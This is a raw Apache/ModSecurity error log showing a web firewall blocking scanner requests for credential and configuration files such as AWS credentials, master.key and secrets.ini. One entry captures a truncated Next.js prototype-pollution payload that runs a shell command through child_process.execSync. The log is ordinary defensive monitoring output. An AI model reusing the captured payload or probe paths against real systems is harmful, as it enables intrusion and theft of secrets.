.vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php_error.log"] [unique_id "aS--LQHUOyVUpr_c5AKGFAAAAAo"] [Wed Dec 03 06:35:57.819605 2025] [:error] [pid 32076:tid 32095] [client 18.198.207.209:47858] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/var/log/apache2/error.log"] [unique_id "aS--LTYrEbMiLh1vkdaA2AAAANE"] [Wed Dec 03 06:35:57.882810 2025] [:error] [pid 32076:tid 32080] [client 18.198.207.209:47872] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/var/log/nginx/error.log"] [unique_id "aS--LTYrEbMiLh1vkdaA2QAAAMI"] [Wed Dec 03 06:35:58.122840 2025] [:error] [pid 32076:tid 32083] [client 18.198.207.209:47878] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aS--LjYrEbMiLh1vkdaA3AAAAMU"] [Wed Dec 03 06:35:58.190786 2025] [:error] [pid 32076:tid 32089] [client 18.198.207.209:47884] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/log/error.log"] [unique_id "aS--LjYrEbMiLh1vkdaA3QAAAMs"] [Wed Dec 03 16:17:30.046047 2025] [:error] [pid 20412:tid 20427] [client 35.178.225.18:57518] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.ini"] [unique_id "aTBGejaN5y-yuajOnDpMygAAAQw"] [Wed Dec 03 16:17:34.956182 2025] [:error] [pid 20412:tid 20434] [client 35.178.225.18:57766] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/aws/config.ini"] [unique_id "aTBGfjaN5y-yuajOnDpM2wAAARM"] [Wed Dec 03 16:17:35.002395 2025] [:error] [pid 20412:tid 20429] [client 35.178.225.18:57780] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/aws/credentials.bak"] [unique_id "aTBGfzaN5y-yuajOnDpM3AAAAQ4"] [Wed Dec 03 16:17:35.538334 2025] [:error] [pid 32076:tid 32081] [client 35.178.225.18:57832] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/.aws/config.bak"] [unique_id "aTBGfzYrEbMiLh1vkdaKWAAAAMM"] [Wed Dec 03 16:17:38.423197 2025] [:error] [pid 20412:tid 20419] [client 35.178.225.18:58014] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "aTBGgjaN5y-yuajOnDpM7QAAAQQ"] [Wed Dec 03 16:17:41.464320 2025] [:error] [pid 20412:tid 20417] [client 35.178.225.18:37350] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/django.ini"] [unique_id "aTBGhTaN5y-yuajOnDpM-QAAAQI"] [Wed Dec 03 16:17:42.013033 2025] [:error] [pid 32076:tid 32092] [client 35.178.225.18:37374] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config/master.key"] [unique_id "aTBGhjYrEbMiLh1vkdaKaQAAAM4"] [Wed Dec 03 16:17:48.697165 2025] [:error] [pid 20412:tid 20429] [client 35.178.225.18:37718] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/app.ini"] [unique_id "aTBGjDaN5y-yuajOnDpNEAAAAQ4"] [Wed Dec 03 16:17:48.738610 2025] [:error] [pid 20412:tid 20421] [client 35.178.225.18:37730] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/local.ini"] [unique_id "aTBGjDaN5y-yuajOnDpNEQAAAQY"] [Wed Dec 03 16:17:48.784924 2025] [:error] [pid 20412:tid 20435] [client 35.178.225.18:37732] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/secrets.ini"] [unique_id "aTBGjDaN5y-yuajOnDpNEgAAARQ"] [Wed Dec 03 16:17:49.852392 2025] [:error] [pid 32076:tid 32095] [client 35.178.225.18:49124] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php.ini"] [unique_id "aTBGjTYrEbMiLh1vkdaKegAAANE"] [Wed Dec 03 16:17:50.234900 2025] [:error] [pid 20412:tid 20420] [client 35.178.225.18:49152] [client 35.178.225.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/system.ini"] [unique_id "aTBGjjaN5y-yuajOnDpNHAAAAQU"] [Sat Dec 06 05:32:19.169104 2025] [:error] [pid 28201:tid 28224] [client 216.73.216.55:45762] [client 216.73.216.55] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aTOjwwaaBQA8K9Y2IUNpggAAABI"] [Sat Dec 06 06:21:26.529214 2025] [:error] [pid 27206:tid 27249] [client 216.73.216.55:31644] [client 216.73.216.55] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/services/dev-unit.com"] [unique_id "aTOvRjVNQf_oW9-JXCrajQAAAIE"] [Sat Dec 06 06:27:15.972730 2025] [:error] [pid 27209:tid 27256] [client 216.73.216.55:19014] [client 216.73.216.55] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aTOwo-suS7TwaJcc3vGjLwAAAMA"] [Sat Dec 06 06:27:16.074442 2025] [:error] [pid 27209:tid 27280] [client 216.73.216.55:19014] [client 216.73.216.55] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/solutions/dev-unit.com"] [unique_id "aTOwpOsuS7TwaJcc3vGjMAAAAMs"] [Thu Dec 11 23:52:35.911385 2025] [:error] [pid 5306:tid 5365] [client 13.204.88.148:57094] [client 13.204.88.148] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aTs9I9jp4gorx3NZH71itgAAAQY"] [Mon Dec 15 10:25:08.941979 2025] [autoindex:error] [pid 8330:tid 8339] [client 74.7.227.33:59532] AH01276: Cannot serve directory /home/id/dev-unit.com/devweb-lastV/public/storage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 15 10:25:09.562616 2025] [:error] [pid 8330:tid 8354] [client 74.7.227.33:59532] [client 74.7.227.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag 